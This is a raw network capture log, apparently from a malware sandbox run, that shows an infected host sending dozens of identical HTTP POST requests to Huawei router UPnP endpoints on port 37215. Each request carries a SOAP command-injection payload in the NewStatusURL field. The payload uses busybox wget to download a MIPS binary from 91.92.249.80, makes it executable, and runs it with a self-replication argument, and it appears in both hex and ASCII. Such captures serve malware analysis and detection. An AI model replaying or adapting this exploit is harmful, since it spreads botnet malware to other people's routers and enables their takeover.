                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1843192.168.2.2358510157.179.137.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549451113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1844192.168.2.234875441.105.75.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549463987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1845192.168.2.2347794197.28.65.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549483061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1846192.168.2.235538261.232.219.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549488068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1847192.168.2.2352254157.248.2.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549499989 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1848192.168.2.2358596157.227.1.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549525023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1849192.168.2.233706441.159.198.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.550101042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1850192.168.2.2360170159.186.212.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.550101042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1851192.168.2.2345278157.21.225.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.550115108 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1852192.168.2.235159041.231.195.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.550165892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1853192.168.2.2346806157.149.59.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.551095009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
